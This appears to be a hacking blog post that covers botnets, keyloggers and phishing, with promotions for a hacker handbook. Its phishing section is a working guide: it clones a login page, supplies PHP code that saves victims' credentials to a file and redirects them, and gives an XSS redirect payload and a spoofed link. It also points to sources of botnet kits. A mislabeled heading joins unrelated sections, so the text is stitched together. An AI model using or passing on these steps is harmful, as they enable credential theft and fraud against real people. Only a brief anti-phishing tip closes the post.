Botnet, also known as robotic network,  is a group of computers that run the same computer robotic application controlled or manipulated by human operators.  They are also called as botmasters for the purpose of doing co-related tasks. The system is organized in a simple hierarchical structure comprised of many computers, also called as drones or zombies, and a command center that controls all of the drones or zombies into action. Botnets can be large (composed of ten to twenty thousand drones) or small (composed of five hundred to a thousand drones).  It really depends on the sophistication and complexity of its use.

Botnets are very good tools in the hacking world because of their ability to gain other computers that could be used for any purpose. If you are familiar with the security vulnerabilities of a network, its workstations and servers, you can wrest control all of its computers in a matter of days, hours or even minutes with the aid of a very sophisticated botnet application.  Once control is obtained, the task can be done remotely or autonomously.

Knowing who developed the first botnet or the authors of this software can be very vague. I mean, honestly, who would want to claim the software as his if it was the one responsible for hacking the entire computer system of the NSA or the CIA?  However, we can actually trace its roots or how it came to be.  In 1998, NetBus and BackOrifice2000 application were introduced in the IT community. Both were sets of applications designed for a friendlier Microsoft Windows-based remote systems management. If you haven’t heard of it, it’s like the famous Go-to-my-PC application  where you could access your computer at home from almost anywhere and perform any normal tasks as if you are actually using the device.  The difference is that it was built as a command base with other additional software for whatever intention and purpose the author has. Some users came up with some ideas on how it could be used maliciously, like in committing pranks and eavesdropping.  Over time, additional refinements where made independently by various groups, mutating it to some nasty Malware Trojan or just a milled one.

How are they made?

To know how botnets are made, we must first understand its known architectures. Currently, the most common architectures used in botnets are the following:

1. Centralized command and control (C&C)  model

Image is taken from. http://www.malwarecity.com/blog/anatomy-of-a-botnet-196.html

This is considered to be the first botnet architecture used. The botmaster may have the option to login to any of C&C server directly or remotely in order to control and communicate with other C&C server and drone computers. The secondary C&C is usually used as a backup just in case the botmaster fails to connect with the first one. The C&C server may not be restricted to just two and is not also only restricted to one network.  It can control as many zombies from deferent networks depending on the botnet’s level of sophistication.

1. Decentralized, P2P or distributed command and control model.

Image is taken from. http://www.malwarecity.com/blog/anatomy-of-a-botnet-196.html

Considered to be the a versatile architecture because any of the drones can be used as a command center making it harder for anyone to pinpoint its source plus you would not worry of establishing your control with this architechture.

What are the Internet protocols used to establish connections? Almost any.  But currently, the Internet Relay Chat (IRC) botnet is still preferred.  It is the favorite of any botmaster because it’s lightweight and secure enough to login and control because of its password protection.  One example of an IRC-based botnet is Agobot.  It has tools like a packet sniffer, keylogger, rootkit, information harvester, smtp and http client and a DoS attack feature.  Internet Messaging botnets also appeared latching to AOL, Yahoo Messenger, and MSN services.  In August, the social networking site twitter.com was discovered to have a botnet installed.  Twitter.com’s used the Hyper Text Tranfer Protocol.  Its security team found that it was being used as a C&C.   Security teams from Symantec also found a botnet C&C in Google groups this September.  It’s dubbed as “trojan.grup.”

How do you make zombies or drones with others computer? It still goes down to the basics of hacking and exploiting the network and all the computer vulnerabilities.  This includes human reverse engineering or email phishing expeditions.

Botnets could carry a wide range of commands and some of the most common are listed below.  Take note, these commands may vary from each botnet.

Flood or DDoS – Command Used for DoS attacks.

Spam – Download a template message and send out the messages from your drones.

Proxy – Primarily used to conceal ones identity by relaying traffic through target        computer

http.download – Command to download files from the internet.

Who makes them?

Majority of  botnet software is freely distributed without any warranty.  It is even possible to build one on top of those that are already available commercially.  Just take note that this software is largely considered a malware/trojan.   Never attempt to install them if you do not have enough knowledge about their applications.  Botnets are related to viruses, malware and rootkits.

What are they used for?

Botnets are one of the best tools you could use in order to do what any hacker would want to be doing. You could remotely initiate some form of eavesdropping or pranks, like logging or injecting user keystrokes, screen captures, program launching, file browsing etc.  For a broader application, botnets could be used for unethical and unlawful commercial applications such as phishing, sending spam, click frauds in order to up a website’s popularity, information harvesting and planting, command and control on an agency, proxy server alternative to cover  tracks while doing research, and lastly, doing denial of service attacks.  Botmasters could even sell their botfarms to the highest bidder, usually the mafia or other large criminal organizations.

What are the largest botnets?

The largest known botnet attack ever recorded was Storm in 2007.  Recently, another botnet was uncovered that nearly infected two million personal computers in April 2008. Its name though has not been made official.  The Storm botnet was generally used for spamming and uses the Kadmelia P2P overlay protocol rather than an IRC network.  A rootkit was also present, enabling it to hide its presence.  It had the ability to harvest email addresses fromits infected drones.

Some Common Types

The OpenSource community does not support creation and distribution of malicious softwares like botnets.  However, you can actually find them on some underground hackers’ websites and even in torrents.  You could also look them up in Google.  Some of these are: urxbot, spybot, sdbot, rxbot, rbot, phatbot, litmus, gtbot, forbot, evilbot, darkirc, agobot, acebot and storm.

One of the recent technologies that aid spying (to put it bluntly) is through keylogging. What is this? Keystroke logging or keylogging is the process of noting the keys struck by a user from a keyboard, which is done in a very covert manner so that he is unaware that the information he is entering into the computer are recorded or monitored. As you can imagine, this kind of tool offers tremendous opportunities for hackers. At the same time, this can also give your system a very tight security.

There are various kinds of keylogging methods around, but currently, the most popular ones in the consumer market are the software-based and hardware-based keyloggers. The main difference between the two is that hardware keyloggers have their own microcontrollers or mini-computers at work and are independent from the computer’s processor, memory and operating system.

A plug-in device or a hardware circuit can be used as keylogger tools. Either of the two can log to their internal memories all of a user’s keyboard activities without him being the wiser. This works like a tape recorder except that the recording is not based on voice but based on keystrokes. The hardware will act as a middle device that intercepts every keystroke that is struck by the user and store it to its built-in memory. The amount of keystrokes that can be stored in the keylogger will depend on the hardware’s memory. The output can then be sent or stored for accessing later on. Getting hold of the inputted keystrokes can be obtained through a program, an interface or even through an e-mail address.

Installing a hardware keylogger can be done inside the USB or PS/2 keyboard. Since the keylogger is inside the equipment, it will be difficult or impossible to detect it since its appearance cannot be distinguished from other wirings. Or, it can be designed so that it blends with the wiring or cabling system of the computer hardware. A step-by-step installation is available when you buy a keylogger from any manufacturer.

Is it possible to create one of your own? Absolutely. It will not be a piece of cake though. You’ll need some experience in electronics hardware. If you have it, your next step is to obtain the components. These could include, among others, a microcontroller, an EEPROM chip, a capacitor and a resistor. Using your knowledge in electronics, the components then can be soldered together to form the hardware schematics. Additional information on how to create a keylogger can be found at this site: http://www.keelog.com/diy.html

While it is possible to build your own hardware keylogger, you may not have the technical expertise to complete the task. Or, you may not have the time to complete it. In that case, what you can do is to shop for a hardware-based keylogger. In buying, there are certain things you need to remember. These include: prices, size and design of the product, operability, installation, and manageability. Take note, hardware keyloggers are relatively expensive. This is mainly because of its components and operational complexity. But if you are security conscious, it’s worth it.

Hardware keylogger in use:

1. Select a target website and navigate to their login page.
2. Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)
3. You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
4. Create a PHP file and name it “phish.php”.
5. Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website.

   <?php
   Header("Location: http://www.RealSite.com");
   
   $handle = fopen("list.txt", "a");
   
   foreach($_GET as $variable => $value) {
   
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
   }fwrite($handle, "\r\n");
   
   fclose($handle);
   exit;
   ?>

   6.  Now we must point the login form in the HTML file to the PHP file. Locate the form code in the HTMl file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL.  The HTML code should start with something like this: <form action =”sitelinkhere.com” method=”GET” >

   7.  Once everything is complete, upload the files to a free webhost that supports PHP.
   8.  That’s it! You’ve just created a phishing page.

   UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.

If you would like a more in depth explanation that includes many pictures and specific examples, I’d reccomend obtaining The Hacker’s Underground Handbook.

• The attacker could add links to web pages with the legitimate website name in the anchor of the hyperlink like the following:

  <a href=”attackersite.com”>www.yahoo.com </a> .

• The attacker could redirect hacked websites to his fake login page. This will confuse some people, making them think they have to login to their email to access the site. Yes, I know that sounds ridiculous, but people do fall for that. An attacker could use HTML, PHP, and Javascript to redirect the main site, but the most effective way is to insert a “.htaccess” file that redirects all traffic instead of just certain pages.

• The attacker could use XSS (Cross Site Scripting) techniques found in the real websites site to redirect to his website. This is more common in lesser known email service providers. An example is: www.Targetsite.com/mail.php?inbox=<script>window.location = “http://phishing-site.com”</script> . This is more deceiving because the victim is first directed to the legitimate website where he is automatically redirected to the attacker’s website via an XSS vulnerability.
• The attacker could send out a mass amount of spoofed E-Mails with links to his phishing website. These E-Mails will look like they came from a legitimate source.
  

If you would like to learn more about carrying out phishing attacks, see The Hacker’s Underground Handbook.

Phishing attacks are most commonly executed through E-Mails. The E-Mails look like they come from trusted sources and ask for personal information like usernames, passwords, credit card numbers, and social security numbers.

To avoid falling for phishing attacks, never go to important websites through links in E-Mails. Also, when logging into a website like Yahoo.com, look at the site URL and make sure it says www.yahoo.com  or a subdomain like login.yahoo.com. If it doesn’t, you know that it is a fake.  For more information on avoiding phishing scams see antiphishing.org.

To learn how phishing sites are created and executed, see the Hacker’s Underground Handbook.